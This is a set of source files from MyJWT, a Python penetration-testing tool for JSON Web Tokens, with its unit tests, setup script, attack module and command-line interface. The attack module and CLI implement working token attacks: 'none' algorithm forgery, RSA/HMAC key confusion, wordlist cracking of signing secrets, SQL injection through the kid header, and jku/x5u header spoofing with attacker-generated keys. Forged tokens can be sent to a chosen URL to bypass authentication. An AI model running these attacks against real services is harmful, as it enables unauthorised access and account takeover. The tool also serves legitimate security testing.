        self.assertEqual(result.exit_code, 0)

    def testNothing(self):
        result = self.runner.invoke(
            myjwt_cli, [self.jwt]
        )
        self.assertEqual(result.exit_code, 0)

    @requests_mock.mock()
    def testX5c(self, m):
        status_code = 200
        m.get("http://test.com", json={
            "keys": [
                {
                    "kty": "RSA",
                    "use": "sig",
                    "kid": "xxxxxxxxx",
                    "n": "oTtAXRgdJ6Pu0jr3hK3opCF5uqKWKbm4KkqIiDJSEsQ4PnAz14P_aJnfnsQwgchFGN95cfCO7euC8HjT"
                         "-u5WHHDn08GQ7ot6Gq6j-fbwMdRWjLC74XqQ0JNDHRJoM4bbj4i8FaBdYKvKmnJ8eSeEjA0YrG8KuTOPbLsgl"
                         "ADUubNw9kggRIvj6au88dnBJ9HeZ27QVVFaIllZpMITtocuPkOKd8bHzkZzKN4HJtM0hgzOjeyCfqZxh1V8LybliWD"
                         "XYivUqmvrzchzwXTAQPJBBfYo9BO6D4Neui8rGbc49OBCnHLCWtPH7m7xp3cz-PbVnLhRczzsQE_3escvTF0FGw",
                    "e": "AQAB",
                    "alg": "RS256"
                }
            ]
        }, status_code=status_code)

        result = self.runner.invoke(
            myjwt_cli, [self.jwtX5u, "--x5u", "http://test.com"]
        )
        self.assertEqual(result.exit_code, 0)



from unittest import TestCase
from MyJWT.Exception import InvalidJwtJson, InvalidParam, UnknownAlg
from MyJWT.modifyJWT import addpayload, addheader, changeAlg, changePayload, signature
from MyJWT.utils import HEADER, PAYLOAD, SIGNATURE, jwtToJson


class TestModifyJWT(TestCase):
    def setUp(self):
        self.invalidJWT = "test.test"
        self.jwt = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6ImF6In0."
        self.jwtRsa = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJsb2dpbiI6ImEifQ.Fjziy6GSQpP9tQRyko5APZjdymkQ8EJGOa"
            "-A2JQ6xcAVucXRhZbdBbAM2DG8io_brP_ROAqYaNlvRVsztXoPHFz_e7D2K0q6f02RXeRwZJGOhy0K"
            "-Oj9Z1UmFJWqVpAAafN75w7OKoSRh6BtQfH8XDleqwpVoywCuWFdYrSbqBoVskRQkp8H-HUC5XmN5om4"
            "-NdiQkiKa7OFQ6Hoklclz9_WD5rc"
            "-HWJp3rJW4EIHzOPfs1GuDuhtIRu0uuRYp4vvzLZcVm0BhlK9e_fmFcbsTz3MwVHIeFEIx2NjQdhE"
            "-CefQ4tNg6Rr6OtgGExToUfD0i0mAoAhTcvmoyO6c2paQ"
        )
        self.jwtHs256 = (
            "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6ImEifQ.KJDuTWSj9wa3NL3j1u2HOijvgu"
            "-oO9tBjKGxjo_qdXQ"
        )
        self.encodedString = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0"
        self.header = {"typ": "JWT", "alg": "none"}
        self.addHeader = {"kid": "1"}
        self.payload = {"login": "az"}
        self.addPayload = {"username": "az"}
        self.signature = ""
        self.jwtJson = {
            HEADER: self.header,
            PAYLOAD: self.payload,
            SIGNATURE: self.signature,
        }
        self.path = "./examples/05-rsa-hmac-confusion/public.pem"

    def testAddPayload(self):
        with self.assertRaises(InvalidJwtJson):
            addpayload({}, {})

        with self.assertRaises(InvalidParam):
            addpayload(self.jwtJson, "")

        newJwtJson = addpayload(self.jwtJson, self.addPayload)
        self.assertListEqual(list(newJwtJson[PAYLOAD].keys()), ["login", "username"])
        self.assertEqual(newJwtJson[PAYLOAD]["username"], self.addPayload["username"])
        self.assertEqual(newJwtJson[PAYLOAD]["login"], self.payload["login"])

        self.assertEqual(newJwtJson[HEADER], self.jwtJson[HEADER])
        self.assertEqual(newJwtJson[SIGNATURE], self.jwtJson[SIGNATURE])

    def testAddHeader(self):
        with self.assertRaises(InvalidJwtJson):
            addheader({}, {})

        with self.assertRaises(InvalidParam):
            addheader(self.jwtJson, "{}")

        newJwtJson = addheader(self.jwtJson, self.addHeader)
        self.assertListEqual(list(newJwtJson[HEADER].keys()), ["typ", "alg", "kid"])
        self.assertEqual(newJwtJson[HEADER]["typ"], self.header["typ"])
        self.assertEqual(newJwtJson[HEADER]["alg"], self.header["alg"])
        self.assertEqual(newJwtJson[HEADER]["kid"], self.addHeader["kid"])

        self.assertEqual(newJwtJson[PAYLOAD], self.jwtJson[PAYLOAD])
        self.assertEqual(newJwtJson[SIGNATURE], self.jwtJson[SIGNATURE])

    def testChangeAlg(self):
        with self.assertRaises(InvalidJwtJson):
            changeAlg({}, "test")

        newJwtJson = changeAlg(self.jwtJson, "test")
        self.assertEqual(newJwtJson[HEADER]["alg"], "test")

        self.assertEqual(newJwtJson[PAYLOAD], self.jwtJson[PAYLOAD])
        self.assertEqual(newJwtJson[SIGNATURE], self.jwtJson[SIGNATURE])

    def testChangePayload(self):
        with self.assertRaises(InvalidJwtJson):
            changePayload({}, {})

        newJwtJson = changePayload(self.jwtJson, self.addPayload)

        self.assertEqual(newJwtJson[PAYLOAD], self.jwtJson[PAYLOAD])

        self.assertEqual(newJwtJson[HEADER], self.jwtJson[HEADER])
        self.assertEqual(newJwtJson[SIGNATURE], self.jwtJson[SIGNATURE])

    def testSignature(self):
        with self.assertRaises(InvalidJwtJson):
            signature({}, "")

        jwt = signature(self.jwtJson, "")
        self.assertEqual(jwt, self.jwt)

        jwtJson = jwtToJson(self.jwtRsa)
        jwtJson = changeAlg(jwtJson, "HS256")
        jwt = signature(jwtJson, open(self.path).read())
        self.assertEqual(jwt, self.jwtHs256)

        newJwtJson = self.jwtJson
        newJwtJson[HEADER]["alg"] = "unknowAlg"
        with self.assertRaises(UnknownAlg):
            signature(newJwtJson, "")



import setuptools

from MyJWT.variables import VERSION

with open("README.md", "r") as f:
    long_description = f.read()
f.close()

with open('dev-requirements.txt', 'r') as f:
    dev_requires = [line.strip() for line in f]
    f.close()

with open('requirements.txt', 'r') as f:
    install_requires = [line.strip() for line in f]
    f.close()

setuptools.setup(
    name="myjwt",
    version=VERSION,
    author="mBouamama",
    author_email="matthieubouamama@gmail.com",
    description="Pentesting Tool for JWT(JSON Web Tokens).Modify/Crack/Check Your jwt.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/mBouamama/MyJWT",
    install_requires=install_requires,
    entry_points={
        "console_scripts": [
            "myjwt = MyJWT.myjwt_cli:myjwt_cli",
        ],
    },
    extras_require={
        "dev": dev_requires,
    },
    packages=setuptools.find_packages(),
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Environment :: Console",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3 :: Only",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Topic :: Security",
        "Topic :: Internet :: WWW/HTTP",
    ],
    python_requires=">=3.6",
)



"""
All methods needed to try vulnerabilities on jwt
"""
import base64
import json

import click
import requests

from OpenSSL import crypto

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding

from MyJWT.Exception import InvalidJWT
from MyJWT.modifyJWT import changeAlg, signature
from MyJWT.utils import jwtToJson, encodeJwt, isValidJwt, HEADER, createCrt


def noneVulnerability(jwt):
    """
    Check none Vulnerability.

    :param str jwt: your jwt
    :return: new jwt
    :rtype: str

    :raise InvalidJWT: if your jwt is not valid
    """
    if not isValidJwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwtJson = changeAlg(jwtToJson(jwt), "none")
    return encodeJwt(jwtJson) + "."


def confusionRsaHmac(jwt, filename):
    """
    Check rsa/hmac confusion.

    :param str jwt: your jwt
    :param str filename: path file
    :return: new jwt
    :rtype: str

    :raise InvalidJWT: if your jwt is not valid
    """
    if not isValidJwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwtJson = changeAlg(jwtToJson(jwt), "HS256")
    return signature(jwtJson, open(filename).read())


def bruteforceDict(jwt, fileName):
    """
    Crack your jwt

    :param str jwt: your jwt
    :param str fileName: path file
    :return: key cracked or "" if key not found
    :rtype: str

    :raise InvalidJWT: if your jwt is not valid
    """
    if not isValidJwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwtJson = jwtToJson(jwt)
    with open(fileName, "r", encoding="latin-1") as file:
        allPassword = [line.rstrip() for line in file]
    file.close()
    for password in allPassword:
        newJwt = signature(jwtJson, password)
        newSig = newJwt.split(".")[2]
        if newSig == jwt.split(".")[2]:
            return password
    return ""


def injectSqlKid(jwt, injection):
    """
    Inject sql to your jwt

    :param str jwt: your jwt
    :param str injection: your injection
    :return: new jwt
    :rtype: str

    :raise InvalidJWT: if your jwt is not valid
    """
    if not isValidJwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwtJson = jwtToJson(jwt)
    jwtJson[HEADER]["kid"] = injection
    return signature(jwtJson, "")


def sendJwtToUrl(url, method, data, cookies, jwt):
    """
    Send requests to your url.

    :param str url: your url
    :param str method: method (GET, POST, etc.....)
    :param dict data: json to send
    :param dict cookies: cookies to send
    :param str jwt: your jwt
    :return: Response
    :rtype: requests.Response
    """
    if method == "POST":
        return requests.post(
            url, json=data, headers={"Authorization": "Bearer " + jwt}, cookies=cookies
        )

    return requests.request(method=method, url=url, json=data, cookies=cookies)


def printDecoded(jwt):
    """
    Print your jwt.

    :param str jwt: your jwt
    :return:
    """
    if not isValidJwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwtJson = jwtToJson(jwt)
    click.echo("Header: " + json.dumps(jwtJson["header"]))
    click.echo("Payload: " + json.dumps(jwtJson["payload"]))
    click.echo("Signature: " + json.dumps(jwtJson["signature"]))


def jkuVulnerability(jwt=None, url=None, file=None, pem=None):
    """
    Check jku Vulnerability.

    :param str jwt: your jwt
    :param str url: url to get your jwk file
    :param str file:  your output json file name
    :param str pem: pem file name

    :return: New Jwt
    :rtype: str
    """
    if not isValidJwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwtJson = jwtToJson(jwt)

    if "jku" not in jwtJson[HEADER]:
        raise InvalidJWT("Invalid JWT format JKU missing")

    if file is None:
        file = "jwk-python"
    jwks = requests.get(jwtJson[HEADER]["jku"]).json()

    jwtJson[HEADER]["alg"] = "RS256"
    jwtJson[HEADER]["jku"] = f"{url}/{file}.json"
    if pem is None:
        key = crypto.PKey()
        key.generate_key(type=crypto.TYPE_RSA, bits=2048)
    else:
        key = crypto.load_privatekey(crypto.FILETYPE_PEM, open(pem).read())
    priv = key.to_cryptography_key()
    pub = priv.public_key()

    e = pub.public_numbers().e
    n = pub.public_numbers().n

    jwks["keys"][0]["e"] = base64.urlsafe_b64encode(
        e.to_bytes(e.bit_length() // 8 + 1, byteorder='big')
    ).decode('UTF-8').rstrip('=')
    jwks["keys"][0]["n"] = base64.urlsafe_b64encode(
        n.to_bytes(n.bit_length() // 8 + 1, byteorder='big')
    ).decode('UTF-8').rstrip('=')

    f = open(f"{file}.json", "w")
    f.write(json.dumps(jwks))
    f.close()

    s = encodeJwt(jwtJson)

    sign = priv.sign(bytes(s, encoding='UTF-8'), algorithm=hashes.SHA256(), padding=padding.PKCS1v15())

    return s + '.' + base64.urlsafe_b64encode(sign).decode('UTF-8').rstrip('=')


def x5uVulnerability(jwt=None, crt=None, pem=None, url=None):
    """
    Check x5u Vulnerability.
    :param str jwt: your jwt
    :param str crt: crt path file
    :param str pem: pem path file
    :param str url: new x5u url
    :return: new jwt
    :rtype: str
    """
    if not isValidJwt(jwt):
        raise InvalidJWT("Invalid JWT format")

    jwtJson = jwtToJson(jwt)
    if "x5u" not in jwtJson[HEADER]:
        raise InvalidJWT("Invalid JWT format JKU missing")
    if crt is None or pem is None:
        crt, pem = createCrt()

    with open(crt, "r") as f:
        content = f.read()
        f.close()

    x5u = requests.get(jwtJson[HEADER]["x5u"]).json()
    x5u["keys"][0]["x5c"] = content \
        .replace("-----END CERTIFICATE-----", "") \
        .replace("-----BEGIN CERTIFICATE-----", "") \
        .replace("\n", "")

    jwtJson[HEADER]["x5u"] = url

    f = open("jwks_with_x5c.json", "w")
    f.write(json.dumps(x5u))
    f.close()

    s = encodeJwt(jwtJson)
    key = crypto.load_privatekey(crypto.FILETYPE_PEM, open(pem).read())

    priv = key.to_cryptography_key()
    sign = priv.sign(bytes(s, encoding='UTF-8'), algorithm=hashes.SHA256(), padding=padding.PKCS1v15())

    return s + '.' + base64.urlsafe_b64encode(sign).decode('UTF-8').rstrip('=')



"""
Cli Package
"""
import json
import sys
from json import JSONDecodeError

import click
import requests

from MyJWT.modifyJWT import changePayload, addheader, changeAlg, signature, addpayload
from MyJWT.utils import jwtToJson, encodeJwt, HEADER, isValidJwt, SIGNATURE
from MyJWT.variables import NOT_VALID_JWT, CHECK_DOCS, NOT_CRAKED, CRACKED, VALID_PAYLOAD, VALID_HEADER, \
    VALID_PAYLOAD_JSON, NEW_JWT, INVALID_SIGNATURE, VALID_SIGNATURE, VALID_DATA, VALID_COOKIES, VERSION
from MyJWT.vulnerabilities import injectSqlKid, bruteforceDict, printDecoded, confusionRsaHmac, sendJwtToUrl, \
    jkuVulnerability, x5uVulnerability


@click.command()
@click.version_option(VERSION)
@click.argument('jwt')
# modify your jwt
@click.option("--full-payload", help="New payload for your jwt.Json format Required.")
@click.option("--add-header", "-h",
              help="Add a new key, value to your jwt header, if key is present old value will be replaced.Format: key=value.",
              multiple=True)
@click.option("--add-payload", "-p",
              help="Add a new key, value to your jwt payload, if key is present old value will be replaced.Format: key=value.",
              multiple=True)
# signature
@click.option("--sign", help="Sign Your jwt with key given.")
@click.option("--verify", help="verify your key.")
# vulnerabilities
@click.option("--none-vulnerability", '-none', is_flag=True, help="Check None Alg vulnerability.")
@click.option("--hmac", type=click.Path(exists=True), help="Check RS/HMAC Alg vulnerability.")
@click.option("--bruteforce", type=click.Path(exists=True),
              help="Bruteforce to guess th secret used to sign the token.")
@click.option("--kid", help="Kid Injection sql")
@click.option("--jku", help="Jku Header to bypass authentication")
@click.option("--x5u", help="X5u Header to bypass authentication")
@click.option("--crt", help="For x5cHeader, force crt file")
@click.option("--key", help="For jku or x5c Header, force private key to your key file")
@click.option("--file", help="For jku Header, force file name")
# print
@click.option("--print", is_flag=True, help="Print Decoded JWT")
# url
@click.option("-u", "--url", help="Url to send your jwt.")
@click.option("-m", "--method", help="Method use for send request to url.(Default GET).", default="GET")
@click.option("-d", "--data",
              help="Data send to your url.Format: key=value. if value = MY_JWT value will be replace by new jwt.",
              multiple=True)
@click.option("-c", "--cookies",
              help="Cookies to send to your url.Format: key=value. if value = MY_JWT value will be replace by new jwt.",
              multiple=True)
def myjwt_cli(jwt, full_payload, add_header, add_payload, sign, verify, none_vulnerability, hmac, bruteforce, kid,
              jku, x5u, crt, key, file, print, url, method, data, cookies):
    """
    Cli method
    :param str jwt: jwt
    :param str full_payload: str json
    :param str add_header: header key=value
    :param str add_payload: payload key=value
    :param str sign: secret key
    :param str verify: secret key
    :param bool none_vulnerability:
    :param str hmac: path private key
    :param str bruteforce: path wordlist
    :param str kid: injection
    :param str jku:  publicip
    :param str x5u:  publicip
    :param str crt: path crt
    :param str key: path key file
    :param str file: jwks name
    :param bool print:
    :param str url: url
    :param str method: methid (default: GET)
    :param str data: data key=value
    :param str cookies: cookies key=value
    :return:
    """
    if not isValidJwt(jwt):
        sys.exit(NOT_VALID_JWT)
    if bruteforce:
        jwtJson = jwtToJson(jwt)
        if "HS" not in jwtJson[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        key = bruteforceDict(jwt, bruteforce)
        if key == "":
            sys.exit(NOT_CRAKED)
        else:
            click.echo(CRACKED + key)
            if not add_header and not add_payload and not full_payload:
                sys.exit()

    if add_payload:
        payloadDict = dict()
        for payload in add_payload:
            newStr = payload.split("=")
            if len(newStr) != 2:
                sys.exit(VALID_PAYLOAD)
            payloadDict[newStr[0]] = newStr[1]
        jwtJson = addpayload(jwtToJson(jwt), payloadDict)
        jwt = encodeJwt(jwtJson) + "." + jwtJson[SIGNATURE]

    if add_header:
        headerDict = dict()
        for header in add_header:
            newStr = header.split("=")
            if len(newStr) != 2:
                sys.exit(VALID_HEADER)
            headerDict[newStr[0]] = newStr[1]
        jwtJson = addheader(jwtToJson(jwt), headerDict)
        jwt = encodeJwt(jwtJson) + "." + jwtJson[SIGNATURE]

    if full_payload:
        click.echo(full_payload)
        try:
            jwtJson = changePayload(jwtToJson(jwt), json.loads(full_payload))
            jwt = encodeJwt(jwtJson) + "." + jwtJson[SIGNATURE]
        except JSONDecodeError:
            sys.exit(VALID_PAYLOAD_JSON)
    if x5u:
        jwt = x5uVulnerability(jwt, url=x5u, pem=key, crt=crt)
        click.echo(NEW_JWT + jwt)
    if jku:
        jwt = jkuVulnerability(jwt, jku, file, key)
        click.echo(NEW_JWT + jwt)
        click.echo(f"Please run python -m http.server --bind {jku} .Before send your jwt")
    if kid:
        jwt = injectSqlKid(jwt, kid)
        if not sign:
            click.echo(NEW_JWT + jwt)
    if hmac:
        jwt = confusionRsaHmac(jwt, hmac)
        click.echo(NEW_JWT + jwt)

    if none_vulnerability:
        jwtJson = changeAlg(jwtToJson(jwt), "none")
        jwt = encodeJwt(jwtJson) + "."
        click.echo(NEW_JWT + jwt)
    if sign:
        jwtJson = jwtToJson(jwt)
        if "HS" not in jwtJson[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        jwt = signature(jwtJson, sign)
        click.echo(NEW_JWT + jwt)
    if verify:
        jwtJson = jwtToJson(jwt)
        if "HS" not in jwtJson[HEADER]["alg"]:
            sys.exit(CHECK_DOCS)
        newJwt = signature(jwtJson, verify)
        click.echo(VALID_SIGNATURE if newJwt.split('.')[2] == jwt.split('.')[2] else INVALID_SIGNATURE)
    if url:
        dataDict = dict()
        for d in data:
            newStr = d.split("=")
            if len(newStr) != 2:
                sys.exit(VALID_DATA)
            if newStr[1] == "MY_JWT":
                dataDict[newStr[0]] = jwt
            else:
                dataDict[newStr[0]] = newStr[1]

        cookiesDict = dict()
        for cookie in cookies:
            newStr = cookie.split("=")
            if len(newStr) != 2:
                sys.exit(VALID_COOKIES)
            if newStr[1] == "MY_JWT":
                cookiesDict[newStr[0]] = jwt
            else:
                cookiesDict[newStr[0]] = newStr[1]
        try:
            t = sendJwtToUrl(url, method, dataDict, cookiesDict, jwt)
            click.echo(t.text)
        except requests.exceptions.ConnectionError:
            sys.exit("Connection Error. Verify your url")
    if print:
        printDecoded(jwt)

    if not none_vulnerability and not hmac and not bruteforce and not sign and not verify and not jku and not x5u and not print:
        click.echo(NEW_JWT + jwt)
    sys.exit()


if __name__ == '__main__':
    myjwt_cli()
